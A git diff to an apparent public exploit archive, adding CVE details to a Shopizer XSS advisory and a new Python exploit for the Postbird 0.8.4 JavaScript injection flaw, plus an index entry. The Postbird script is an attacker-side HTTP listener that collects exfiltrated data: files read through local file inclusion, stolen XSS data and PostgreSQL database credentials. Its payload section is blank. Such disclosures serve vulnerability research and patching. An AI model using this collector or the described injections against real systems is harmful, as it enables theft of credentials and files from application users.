diff --git a/exploits/java/webapps/49901.txt b/exploits/java/webapps/49901.txt
index f161231f4..38d1f11b1 100644
--- a/exploits/java/webapps/49901.txt
+++ b/exploits/java/webapps/49901.txt
@@ -4,6 +4,7 @@
# Vendor Homepage: https://www.shopizer.com
# Software Link: https://github.com/shopizer-ecommerce/shopizer
# Version: <= 2.16.0
+# CVE: CVE-2021-33561, CVE-2021-33562
Stored XSS - 'customer_name' Administration
@@ -16,6 +17,7 @@ Steps to reproduce:
3. Change customer name to and save it
4. Open "Customers" -> XSS payload will trigger
+Except "Customers" section, XSS will be executed in "Orders" (/admin/orders/list.html) and "Recent orders" (/admin/home.html)
Reflected XSS - 'ref' parameter
diff --git a/exploits/multiple/webapps/49910.py b/exploits/multiple/webapps/49910.py
new file mode 100755
index 000000000..20d43acee
--- /dev/null
+++ b/exploits/multiple/webapps/49910.py
@@ -0,0 +1,88 @@
+# Exploit Title: Postbird 0.8.4 - Javascript Injection
+# Date: [26 May 2021]
+# Exploit Author: Debshubra Chakraborty
+# Vendor Homepage: https://github.com/paxa/postbird
+# Software Link: https://www.electronjs.org/apps/postbird
+# Version: 0.8.4
+# Tested on: Linux
+# CVE : CVE-2021-33570
+
+"""
+XSS Payload
+
+
+LFI Payload
+
+
+PostgreSQL Password Stealing Payload
+
+
+"""
+
+from http.server import BaseHTTPRequestHandler, HTTPServer
+import urllib.parse
+import re
+
+hostName = '0.0.0.0'
+serverPort = 5555
+
+class MyServer(BaseHTTPRequestHandler):
+ def do_GET(self):
+ self.send_response(200)
+ parse(urllib.parse.unquote(self.requestline))
+
+ def log_message(self, format, *args):
+ return
+
+
+def parse(data):
+ expression = re.search('\S+=', data)
+ attr = expression.group()
+
+ if attr[2:len(attr)-1] == 'file':
+ data = data[12:len(data)-11]
+ data = data.rsplit('\\n')
+ print(f'\n[+] File received from LFI: \n\n')
+ for output in data:
+ print(output)
+
+ elif attr[2:len(attr)-1] == 'xss':
+ data = data[11:len(data)-10]
+ print(f'\n[+] Data exfiltration from Stored XSS: \n\n{data}')
+
+ elif attr[2:len(attr)-1] == 'credentials':
+ pos = re.search('{"\S+:', data)
+ data = data[pos.start():len(data)-11]
+ for i in range(2, len(data), 1):
+ if data[i] == '"':
+ pos = i
+ break
+
+ host = data[2:pos]
+ data = data[14:]
+ data = data.rsplit(',')
+ print(f'\n\n[+] The Database credentials received\n\nHost = {host}')
+ for output in data:
+ print(output)
+
+ else:
+ print(f'\n\n[-] Unknown header attribute found, atribute = {attr[2:len(attr)-1]}')
+
+
+def main():
+ global hostName, serverPort
+ webServer = HTTPServer((hostName, serverPort), MyServer)
+ print("Server started http://%s:%s" % (hostName, serverPort))
+
+ try:
+ webServer.serve_forever()
+
+ except KeyboardInterrupt:
+ pass
+
+ webServer.server_close()
+ print("\nServer stopped.")
+
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index d2efa3b60..b5c6ea524 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44073,3 +44073,4 @@ id,file,description,date,author,type,platform,port
49905,exploits/php/webapps/49905.txt,"WordPress Plugin Cookie Law Bar 1.2.1 - 'clb_bar_msg' Stored Cross-Site Scripting (XSS)",2021-05-25,"Mesut Cetin",webapps,php,
49907,exploits/multiple/webapps/49907.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated) (3)",2021-05-26,"Ron Jost",webapps,multiple,
49909,exploits/php/webapps/49909.py,"Pluck CMS 4.7.13 - File Upload Remote Code Execution (Authenticated)",2021-05-26,"Ron Jost",webapps,php,
+49910,exploits/multiple/webapps/49910.py,"Postbird 0.8.4 - Javascript Injection",2021-05-27,"Debshubra Chakraborty",webapps,multiple,